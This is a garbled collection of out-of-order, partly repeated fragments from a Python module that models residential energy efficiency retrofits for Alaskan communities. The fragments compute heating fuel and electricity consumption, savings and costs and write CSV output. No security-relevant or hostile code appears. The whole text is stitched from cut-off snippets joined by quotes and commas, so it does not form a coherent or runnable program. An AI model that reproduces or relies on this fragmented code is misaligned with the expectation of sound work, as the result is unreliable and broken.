\"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed", "ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating", "constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\", "the component runs to completion, False otherwise reason : string lists reason for", "costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\", "initial value: forecast cd : dictionary general data for a community. Initial value:", "on CommunityData Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics", "#~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas", "Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area", "a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption", "gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil -", "\"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post", "# comes from. 
con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~", "-rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if", "for a community forecast : Forecast forecast for a community diagnostics : diagnostics,", "component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics()", "(MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating", "= self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost -", "or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption()", "Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH)", "from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the", "diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast,", "diagnostics for tracking error/warning messages initial value: diag or new diagnostics object forecast", "float savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd", "years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF)", "by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the", "= np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler =", "set 
to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed", "Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating", "scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file", "years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\", "cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost", "Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year)", "savings created by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year)", "Reduction\"]) total = area * EUI # the one in each of these", "HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted", "(cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential:", "Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass", "for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\", "Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post", "project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost", "offset heating fuels. 
The cost to retrofit each home is also calculated. Parameters", "kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con):", "b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost =", "HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption -", "(MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating", "heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0", "price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price +", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption", "directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices +", "self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP*", "self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu =", "See also -------- aaem.community_data : community data module, see information on CommunityData Object", "/ 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf)", "self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ 
self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced", "of units that have not been retrofit as of 2010, the performance improvements", "rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI", "must be a known Heat Recovery project for this component to run. Parameters", "float initial heating oil consumption init_wood : float initial heating cordwood consumption init_gas", "Energy Model: This module estimates the potential improvements to heating efficiency of residential", "post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost", "save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters ---------- directory", "Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year)", "project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH", "import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy", "(gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural", "savings ($/year) are the difference in the base and proposed fuel costs \"\"\"", "r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords", "b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price", "yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total 
Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con", "Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric", "\\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler", "def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a house.", "]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()]", "electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per", "baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index =", "Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\":", "consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float % of", "total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH", "optional Scalers to adjust normal run variables. See note on accepted scalers Attributes", "6000 \"\"\" # 500 average energy use, 12 months in a year. 
That's", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction *", "module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag", "= \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption =", "= b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption *", "= os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\")", "\"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ----------", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction *", "use, 12 months in a year. 
That's where the 6000.0 # comes from.", "Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential:", "#~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\", "LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil", "corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption", "forecast for estimating future values initial value: forecast cd : dictionary general data", "lists reason for failure if run == False Notes ----- Accepted scalers: capital", "baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline", "= self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec", "\"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\":", "np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0", "s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec =", "}, years) try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential:", "self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = 
avg_EUI_reduction", "Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\":", "self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community',", "* constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption", "float savings in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu:", "Avg. EUI Reduction\"]) total = area * EUI # the one in each", "try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil", "\\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details(", "electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ##", "\"\"\" import numpy as np from pandas import DataFrame import os from aaem.components.annual_savings", "Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast : Forecast", "import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings):", "comes from. 
con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses", "(self, directory): \"\"\"Save the component output csv in directory Parameters ---------- directory :", "self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\", "conversion factor Returns ------- float: fuel consumed for a type of fuel \"\"\"", "in heating cordwood consumption savings_gas : float savings in natural gas fuel consumption", "self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\", ": np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption", "print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI", "= np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction =", "consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values", "self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per", "per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\", "\"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag)", ": float savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\"", "component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if", "self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * 
LP_price", "\"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post", "(base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns", "residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH =", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt", "Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\":", "community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption =", "= community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric", ": float savings in heating cordwood consumption savings_gas : float savings in natural", "fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural", "\\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption *", "year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) /", "'Residential Buildings' section of community_data See also -------- aaem.community_data : community data module,", ": float savings in heating oil consumption savings_wood : float savings in heating", "Houses to retrofit was negative, setting to 0\" ) ## % as decimal", "UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model:", "year \"\"\" 
self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] #", "#~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses", "prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price", "def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ----------", "baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption =", "= self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption", "(self): \"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings :", "rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\", "\"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get", "gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility", "np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns", "\"\"\" Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas", "= avg_EUI_reduction * self.opportunity_HH * \\ 
self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~", "self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\", "this component to run. Parameters ---------- scalers : dictionary of valid scalers, optional", "= np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH,", "from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import", "(Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG,", "def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the", "messages prerequisites : dictionary of components, optional prerequisite component data this component has", "prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial", "np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data", "\"\"\"Save the component output csv in directory Parameters ---------- directory : path output", "baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating", "total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF *", "base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) *", "component to run. 
Parameters ---------- scalers : dictionary of valid scalers, optional Scalers", "* LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit", "baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd", "of residential buildings (homes). Consumption and savings are based on the number of", "information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None,", "HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas =", "self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes", "Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating", "self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save", "if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest", "Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil,", "Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating", "Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost,", "'_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end", "community. 
Initial value: 'community' section of community_data comp_specs : dictionary component specific data", "self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt =", "\"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price", "area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction", "* \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH", "oil consumption savings_wood : float savings in heating cordwood consumption savings_gas : float", ": np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF", "baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per", "\\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate", "fuel consumption init_LP : float initial propane consumption init_kWh : float initial electric", "= self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption", "self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12", "fuel_amnt: float % of fuel used total_consumption : float total consumption for residential", "self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating", "= np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "in gallons \"\"\" 
base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat", "self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH", "months in a year. That's where the 6000.0 # comes from. con_threshold =", "#~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption", "\"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF : float", "len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption *", "Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All", "constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\", "LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed", "Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year)", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) /", "if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption()", "Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(),", "(self): \"\"\"Estimate the # of households for the first year of the project", 
"import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable", "HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt:", "by fuel from the total consumption Parameters ---------- fuel_amnt: float % of fuel", "constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf", "= self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost", "% as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area", ": bool True in the component runs to completion, False otherwise reason :", "- r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP", "self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings()", "Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas", "\\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption *", "completion, False otherwise reason : string lists reason for failure if run ==", "\"\"\"Estimate the # of households for the first year of the project Attributes", "consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH =", "savings_LP : float savings in propane 
consumption savings_kWh : float savings in electric", "\"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years,", "community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary", "All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\"", "[cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas", "\"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\",", "= True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 